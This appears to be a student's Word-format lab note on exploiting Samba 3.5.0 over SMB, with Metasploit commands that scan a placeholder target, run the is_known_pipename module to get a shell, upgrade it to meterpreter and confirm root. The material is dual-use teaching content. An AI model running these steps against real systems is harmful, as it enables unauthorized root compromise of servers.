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8585" w14:textId="77777777" w:rsidR="00E175DC" w:rsidRPr="007A27CC" w:rsidRDefault="00B97FC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Samba</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C1EE1" w14:textId="5AFC13AF" w:rsidR="00E175DC" w:rsidRDefault="007A27CC">
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E175DC">
        <w:t>haring files on a local network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A6BE2" w14:textId="5F84AE57" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:r>
        <w:t>Server message block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D62BE" w14:textId="470E2A0F" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:r>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidR="00817117" w:rsidRPr="00817117">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00817117" w:rsidRPr="00817117">
        <w:t>(direct over TCP)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> =445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848D6AE" w14:textId="2D95D717" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>= 139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58C0FD" w14:textId="77777777" w:rsidR="00E175DC" w:rsidRDefault="00E175DC"/>
    <w:p w14:paraId="6426714C" w14:textId="114B5572" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:r>
        <w:t xml:space="preserve">Samba is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> implementation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8EC1E2" w14:textId="77777777" w:rsidR="00E175DC" w:rsidRDefault="00E175DC"/>
    <w:p w14:paraId="05F29987" w14:textId="659C0B92" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:r w:rsidRPr="00E175DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Samba v3.5.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is vuln to remote code execution, allowing attacker to upload a shared library to writable share and then cause server to load and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A49B5F" w14:textId="4CEF854E" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:r>
        <w:t xml:space="preserve"># shared library is Linux equivalent of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file, these are </w:t>
      </w:r>
      <w:r w:rsidR="007A27CC">
        <w:t>libraries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> called upon by the services and program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD6D6FD" w14:textId="77777777" w:rsidR="00E175DC" w:rsidRDefault="00E175DC"/>
    <w:p w14:paraId="4D636723" w14:textId="6FCA49D8" w:rsidR="00E175DC" w:rsidRPr="00E175DC" w:rsidRDefault="00E175DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E175DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2BBC5E" w14:textId="74DB1F6C" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F3014FC" w14:textId="2476F422" w:rsidR="00E175DC" w:rsidRDefault="00E175DC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17798538" w14:textId="1D0955A0" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD5440" w14:textId="7989F115" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:r>
        <w:t>Workspace -a samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F724CC" w14:textId="3EF15AEF" w:rsidR="00E175DC" w:rsidRDefault="00E175DC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75A89B70" w14:textId="226E3AF3" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Workpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B276D6C" w14:textId="36D32114" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_nmap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-O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="520B53EC" w14:textId="5F83A828" w:rsidR="00E175DC" w:rsidRDefault="00E175DC">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>name:samba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48503854" w14:textId="77777777" w:rsidR="00E175DC" w:rsidRDefault="00E175DC"/>
    <w:p w14:paraId="6B7DFF27" w14:textId="7817D2B8" w:rsidR="000F65CF" w:rsidRDefault="000F65CF">
      <w:r>
        <w:t>Use (samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748556F9" w14:textId="2145DB35" w:rsidR="000F65CF" w:rsidRDefault="000F65CF">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F87990" w14:textId="27EAEF6F" w:rsidR="000F65CF" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BDAD93" w14:textId="1624ABA8" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t xml:space="preserve"># check </w:t>
      </w:r>
      <w:r w:rsidR="00C8261E">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>f the target is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D074D80" w14:textId="63B71416" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A776F19" w14:textId="2BBB37DB" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0987B46A" w14:textId="3DB067A5" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB98CA7" w14:textId="540FDDA7" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B77A7" w14:textId="42352340" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C41D9AA" w14:textId="77777777" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D"/>
    <w:p w14:paraId="190E7D3B" w14:textId="44BBAF31" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>put</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0836E5ED" w14:textId="52144989" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4EC26A" w14:textId="256F2027" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF7FDA" w14:textId="5448D046" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D"/>
    <w:p w14:paraId="085F51EE" w14:textId="2FE2E0AD" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t xml:space="preserve"># upgrade to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC7B1C9" w14:textId="21E39B8E" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50F75DFE" w14:textId="2D623A17" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459BB3F8" w14:textId="435307D4" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3A218" w14:textId="4269C27E" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Set LHOST eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234BD2BA" w14:textId="548E9B9F" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Set session (number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C154B5D" w14:textId="37DEE4D0" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D37A522" w14:textId="71C208B7" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>upgrade</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the command shell session to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r w:rsidR="00C8261E">
        <w:t>and open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this one more session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3BDA80" w14:textId="77777777" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D"/>
    <w:p w14:paraId="7BE3DD96" w14:textId="09953EA8" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492CA013" w14:textId="2AFBDEC9" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t>Sessions (number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC30C4E" w14:textId="7F00B081" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3396BA" w14:textId="58BF0344" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D356E4A" w14:textId="75464C63" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D">
      <w:r>
        <w:t># 0’s means root user that means we have higher permission in this system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD68FD" w14:textId="77777777" w:rsidR="007F2E4D" w:rsidRDefault="007F2E4D"/>
    <w:p w14:paraId="3EC03D43" w14:textId="77777777" w:rsidR="00E175DC" w:rsidRDefault="00E175DC"/>
    <w:p w14:paraId="0BAD348A" w14:textId="6875A349" w:rsidR="00E175DC" w:rsidRPr="007A27CC" w:rsidRDefault="007A27CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2759618A" w14:textId="77777777" w:rsidR="007A27CC" w:rsidRPr="007A27CC" w:rsidRDefault="007A27CC" w:rsidP="007A27CC">
      <w:r w:rsidRPr="007A27CC">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLL file</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:t xml:space="preserve"> (Dynamic Link Library) is a file that contains </w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>code and functions</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:t xml:space="preserve"> that can be </w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shared and used by multiple programs</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:t xml:space="preserve"> in Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFFC31A" w14:textId="77777777" w:rsidR="007A27CC" w:rsidRPr="007A27CC" w:rsidRDefault="007A27CC" w:rsidP="007A27CC">
      <w:r w:rsidRPr="007A27CC">
        <w:t>In simple words:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:t xml:space="preserve"> It’s like a helper file that programs use to perform common tasks (e.g., printing, opening files, showing windows).</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="007A27CC">
        <w:t xml:space="preserve"> Instead of copying the same code into every program, Windows loads the DLL when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED7267" w14:textId="77777777" w:rsidR="007A27CC" w:rsidRDefault="007A27CC"/>
    <w:sectPr w:rsidR="007A2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CD"/>
    <w:rsid w:val="000F65CF"/>
    <w:rsid w:val="00150FCD"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007A27CC"/>
    <w:rsid w:val="007F2E4D"/>
    <w:rsid w:val="00817117"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00B97FC9"/>
    <w:rsid w:val="00C06670"/>
    <w:rsid w:val="00C8261E"/>
    <w:rsid w:val="00E175DC"/>
    <w:rsid w:val="00EE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9D1D7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E762E645-0267-4EA9-B8B9-23FCBA02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216</Words>
  <Characters>1267</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>126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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T13:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-08T14:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>